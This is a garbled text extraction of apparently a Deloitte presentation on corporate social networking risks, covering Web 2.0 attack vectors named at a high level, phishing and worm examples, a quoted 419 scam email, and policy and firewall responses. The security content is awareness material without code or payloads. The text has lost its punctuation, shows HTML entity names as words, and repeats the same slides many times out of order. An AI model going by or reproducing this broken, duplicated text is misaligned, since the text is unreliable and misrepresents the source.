bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
